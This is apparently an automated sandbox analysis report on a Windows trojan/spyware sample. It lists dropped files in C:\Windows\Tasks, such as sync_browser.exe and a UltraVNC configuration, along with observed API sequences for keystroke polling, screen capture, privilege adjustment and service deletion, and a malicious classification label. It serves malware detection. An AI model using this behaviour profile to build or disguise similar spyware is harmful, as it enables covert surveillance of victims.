Code function: 21_2_00007FF7D5933770 GetDC,CreateCompatibleDC,CreateCompatibleBitmap,GetDIBits,GetDIBits,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,CreateCompatibleBitmap,DeleteObject,timeGetTime,SelectObject,BitBlt,SelectObject,timeGetTime,timeGetTime,GetPixel,timeGetTime,ReleaseDC,DeleteDC,DeleteObject,

21_2_00007FF7D5933770

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 21_2_00007FF7D5980650 VkKeyScanA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,GetKeyState,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,MapVirtualKeyA,GetAsyncKeyState,GetAsyncKeyState,CreateThread,CloseHandle,WinExec,MapVirtualKeyA,

21_2_00007FF7D5980650

Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59474C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,		21_2_00007FF7D59474C0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59474C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,		26_2_00007FF7D59474C0

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 21_2_00007FF7D5942E40 OpenSCManagerA,OpenServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

21_2_00007FF7D5942E40

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 21_2_00007FF7D593D560 GetModuleFileNameA,FindWindowA,GetWindowThreadProcessId,OpenProcess,OpenProcessToken,CreateProcessAsUserA,GetLastError,CloseHandle,CloseHandle,CloseHandle,CloseHandle,

21_2_00007FF7D593D560

Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5943550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,	21_2_00007FF7D5943550
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59434B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	21_2_00007FF7D59434B0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5943550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,	26_2_00007FF7D5943550
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59434B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	26_2_00007FF7D59434B0

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\5482310161066753	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\CEpr8q.li7XUg	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\GIjul8.QTIrrr	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\gTFLK1.jBd3Ei	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\sdABZ4.E1924R	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\5482310161066753.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\sync_browser.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\UltraVNC.ini	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\conhost.exe	Jump to behavior

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Code function: 0_2_00405721	0_2_00405721
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Code function: 0_2_004139D1	0_2_004139D1
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Code function: 0_2_00413AAB	0_2_00413AAB
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Code function: 0_2_00413370	0_2_00413370
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Code function: 0_2_00413D43	0_2_00413D43
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Code function: 0_2_0040AD30	0_2_0040AD30
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59536D0	21_2_00007FF7D59536D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5952650	21_2_00007FF7D5952650
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5980650	21_2_00007FF7D5980650
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5963E20	21_2_00007FF7D5963E20
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5951620	21_2_00007FF7D5951620
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5934E80	21_2_00007FF7D5934E80
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59F068C	21_2_00007FF7D59F068C
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5961660	21_2_00007FF7D5961660
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D595AE70	21_2_00007FF7D595AE70
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5931DD0	21_2_00007FF7D5931DD0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5956DD1	21_2_00007FF7D5956DD1
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D594C5B0	21_2_00007FF7D594C5B0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5948E10	21_2_00007FF7D5948E10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D594E610	21_2_00007FF7D594E610
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D594AD30	21_2_00007FF7D594AD30
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5954D7E	21_2_00007FF7D5954D7E
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5948590	21_2_00007FF7D5948590
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D594C8D0	21_2_00007FF7D594C8D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59470B0	21_2_00007FF7D59470B0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5941100	21_2_00007FF7D5941100
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D593A910	21_2_00007FF7D593A910
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59420E0	21_2_00007FF7D59420E0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5931880	21_2_00007FF7D5931880
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D594A890	21_2_00007FF7D594A890
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D594C090	21_2_00007FF7D594C090
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D595A870	21_2_00007FF7D595A870
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D593C810	21_2_00007FF7D593C810
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5949740	21_2_00007FF7D5949740
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59EDF80	21_2_00007FF7D59EDF80
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D595E780	21_2_00007FF7D595E780
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D594AF60	21_2_00007FF7D594AF60
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5933770	21_2_00007FF7D5933770
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59A12C0	21_2_00007FF7D59A12C0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D595C2C0	21_2_00007FF7D595C2C0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5937ACF	21_2_00007FF7D5937ACF
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5937A9A	21_2_00007FF7D5937A9A
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5937B04	21_2_00007FF7D5937B04
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D595AB10	21_2_00007FF7D595AB10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D595623E	21_2_00007FF7D595623E
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59E7250	21_2_00007FF7D59E7250
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5937A1C	21_2_00007FF7D5937A1C
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5955A33	21_2_00007FF7D5955A33
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5933A90	21_2_00007FF7D5933A90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5937A5B	21_2_00007FF7D5937A5B
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5940270	21_2_00007FF7D5940270
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5932270	21_2_00007FF7D5932270
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5958A70	21_2_00007FF7D5958A70
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59551B7	21_2_00007FF7D59551B7
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D593E1D0	21_2_00007FF7D593E1D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59381AD	21_2_00007FF7D59381AD
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5934200	21_2_00007FF7D5934200
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59379E9	21_2_00007FF7D59379E9
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59F09F0	21_2_00007FF7D59F09F0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D595D150	21_2_00007FF7D595D150
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5946930	21_2_00007FF7D5946930
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D594A130	21_2_00007FF7D594A130
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D595F980	21_2_00007FF7D595F980
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5948980	21_2_00007FF7D5948980
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5935170	21_2_00007FF7D5935170
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5952CC0	21_2_00007FF7D5952CC0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59654A0	21_2_00007FF7D59654A0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5965CA0	21_2_00007FF7D5965CA0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5941D10	21_2_00007FF7D5941D10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5961CE0	21_2_00007FF7D5961CE0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D593DCF0	21_2_00007FF7D593DCF0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D595DCF0	21_2_00007FF7D595DCF0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D595A420	21_2_00007FF7D595A420
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59F8C90	21_2_00007FF7D59F8C90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5963460	21_2_00007FF7D5963460
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59F2C70	21_2_00007FF7D59F2C70
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5956BBD	21_2_00007FF7D5956BBD
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D594B3D0	21_2_00007FF7D594B3D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D595739B	21_2_00007FF7D595739B
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5937BA6	21_2_00007FF7D5937BA6
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59EE400	21_2_00007FF7D59EE400
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5944C10	21_2_00007FF7D5944C10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5937BE2	21_2_00007FF7D5937BE2
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59493E0	21_2_00007FF7D59493E0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5937B37	21_2_00007FF7D5937B37
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5960330	21_2_00007FF7D5960330
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D594BB80	21_2_00007FF7D594BB80
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5947B90	21_2_00007FF7D5947B90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5934390	21_2_00007FF7D5934390
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5937B71	21_2_00007FF7D5937B71
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59536D0	26_2_00007FF7D59536D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5952650	26_2_00007FF7D5952650
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5980650	26_2_00007FF7D5980650
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5963E20	26_2_00007FF7D5963E20
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5951620	26_2_00007FF7D5951620
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5934E80	26_2_00007FF7D5934E80
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59F068C	26_2_00007FF7D59F068C
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5961660	26_2_00007FF7D5961660
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D595AE70	26_2_00007FF7D595AE70
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5931DD0	26_2_00007FF7D5931DD0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5956DD1	26_2_00007FF7D5956DD1
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D594C5B0	26_2_00007FF7D594C5B0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5948E10	26_2_00007FF7D5948E10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D594E610	26_2_00007FF7D594E610
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5952DF3	26_2_00007FF7D5952DF3
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D594AD30	26_2_00007FF7D594AD30
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5954D7E	26_2_00007FF7D5954D7E
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5948590	26_2_00007FF7D5948590
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D594C8D0	26_2_00007FF7D594C8D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59470B0	26_2_00007FF7D59470B0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5941100	26_2_00007FF7D5941100
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D593A910	26_2_00007FF7D593A910
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59420E0	26_2_00007FF7D59420E0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5931880	26_2_00007FF7D5931880
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D594A890	26_2_00007FF7D594A890
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D594C090	26_2_00007FF7D594C090
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D595A870	26_2_00007FF7D595A870
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D593C810	26_2_00007FF7D593C810
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5949740	26_2_00007FF7D5949740
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59EDF80	26_2_00007FF7D59EDF80
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D595E780	26_2_00007FF7D595E780
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D594AF60	26_2_00007FF7D594AF60
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5933770	26_2_00007FF7D5933770
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59A12C0	26_2_00007FF7D59A12C0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D595C2C0	26_2_00007FF7D595C2C0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5937ACF	26_2_00007FF7D5937ACF
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5937A9A	26_2_00007FF7D5937A9A
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5937B04	26_2_00007FF7D5937B04
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D595AB10	26_2_00007FF7D595AB10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D595623E	26_2_00007FF7D595623E
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59E7250	26_2_00007FF7D59E7250
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5937A1C	26_2_00007FF7D5937A1C
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5955A33	26_2_00007FF7D5955A33
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5933A90	26_2_00007FF7D5933A90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5937A5B	26_2_00007FF7D5937A5B
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5940270	26_2_00007FF7D5940270
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5932270	26_2_00007FF7D5932270
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5958A70	26_2_00007FF7D5958A70
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59551B7	26_2_00007FF7D59551B7
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D593E1D0	26_2_00007FF7D593E1D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59381AD	26_2_00007FF7D59381AD
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5934200	26_2_00007FF7D5934200
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59379E9	26_2_00007FF7D59379E9
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59F09F0	26_2_00007FF7D59F09F0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D595D150	26_2_00007FF7D595D150
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5946930	26_2_00007FF7D5946930
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D594A130	26_2_00007FF7D594A130
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D595F980	26_2_00007FF7D595F980
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5948980	26_2_00007FF7D5948980
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5935170	26_2_00007FF7D5935170
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59654A0	26_2_00007FF7D59654A0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5965CA0	26_2_00007FF7D5965CA0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5941D10	26_2_00007FF7D5941D10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5961CE0	26_2_00007FF7D5961CE0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D593DCF0	26_2_00007FF7D593DCF0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D595DCF0	26_2_00007FF7D595DCF0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D595A420	26_2_00007FF7D595A420
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59F8C90	26_2_00007FF7D59F8C90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5963460	26_2_00007FF7D5963460
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59F2C70	26_2_00007FF7D59F2C70
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5956BBD	26_2_00007FF7D5956BBD
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D594B3D0	26_2_00007FF7D594B3D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D595739B	26_2_00007FF7D595739B
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5937BA6	26_2_00007FF7D5937BA6
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59EE400	26_2_00007FF7D59EE400
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5944C10	26_2_00007FF7D5944C10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5937BE2	26_2_00007FF7D5937BE2
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59493E0	26_2_00007FF7D59493E0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5937B37	26_2_00007FF7D5937B37
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5960330	26_2_00007FF7D5960330
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D594BB80	26_2_00007FF7D594BB80
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5947B90	26_2_00007FF7D5947B90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5934390	26_2_00007FF7D5934390
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5937B71	26_2_00007FF7D5937B71

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Code function: String function: 004026B0 appears 38 times
Source: C:\Windows\Tasks\sync_browser.exe	Code function: String function: 00007FF7D59E7C50 appears 60 times
Source: C:\Windows\Tasks\sync_browser.exe	Code function: String function: 00007FF7D59E9500 appears 42 times
Source: C:\Windows\Tasks\sync_browser.exe	Code function: String function: 00007FF7D5933730 appears 730 times
Source: C:\Windows\Tasks\sync_browser.exe	Code function: String function: 00007FF7D59E70B4 appears 56 times
Source: C:\Windows\Tasks\sync_browser.exe	Code function: String function: 00007FF7D599A3B0 appears 38 times
Source: C:\Windows\Tasks\sync_browser.exe	Code function: String function: 00007FF7D593AE30 appears 34 times

Source: GIjul8.QTIrrr.0.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: GIjul8.QTIrrr.0.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: GIjul8.QTIrrr.3.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: GIjul8.QTIrrr.3.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: sync_browser.exe.7.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: sync_browser.exe.7.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate

Source: Olz7TmvkEW.exe, 00000000.00000000.2170705266.000000000041C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamebrowser.exe( vs Olz7TmvkEW.exe
Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.000000000287B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWinVNC.exe0 vs Olz7TmvkEW.exe
Source: Olz7TmvkEW.exe, 00000000.00000003.2173784674.00000000026BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCONHOST.EXEj% vs Olz7TmvkEW.exe
Source: Olz7TmvkEW.exe, 00000000.00000003.2175678289.0000000000ABB000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWinVNC.exe0 vs Olz7TmvkEW.exe
Source: Olz7TmvkEW.exe	Binary or memory string: OriginalFilenamebrowser.exe( vs Olz7TmvkEW.exe

Source: Olz7TmvkEW.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: sdABZ4.E1924R.0.dr

Binary string: \Device\ConDrv\Serveronecore\windows\core\console\open\src\server\winntcontrol.cpponecore\windows\core\console\open\src\interactivity\base\servicelocator.cppHost Signal Handler Threadonecore\windows\core\console\open\src\interactivity\base\hostsignalinputthread.cpponecore\windows\core\console\open\src\interactivity\win32\uiatextrange.cpponecore\windows\core\console\open\src\interactivity\win32\accessibilitynotifier.cpponecore\windows\core\console\open\src\interactivity\win32\windowmetrics.cpponecore\windows\core\console\open\src\interactivity\win32\systemconfigurationprovider.cpponecore\windows\core\console\open\src\interactivity\win32\window.cpponecore\windows\core\console\open\src\interactivity\win32\windowio.cpponecore\windows\core\console\open\src\interactivity\win32\icon.cpponecore\windows\core\console\open\src\interactivity\win32\windowuiaprovider.cpponecore\windows\core\console\open\src\interactivity\win32\windowproc.cpponecore\windows\core\console\open\src\interactivity\win32\clipboard.cpponecore\windows\core\console\open\src\interactivity\win32\screeninfouiaprovider.cpponecore\windows\core\console\open\src\types\viewport.cpponecore\windows\core\console\open\src\types\convert.cpponecore\windows\core\console\open\src\types\utils.cpp

Source: classification engine

Classification label: mal84.troj.spyw.evad.winEXE@50/46@2/1

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe

Code function: 0_2_00408DBF wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,

0_2_00408DBF

Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5943550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,	21_2_00007FF7D5943550
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59418A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,	21_2_00007FF7D59418A0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59434B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	21_2_00007FF7D59434B0
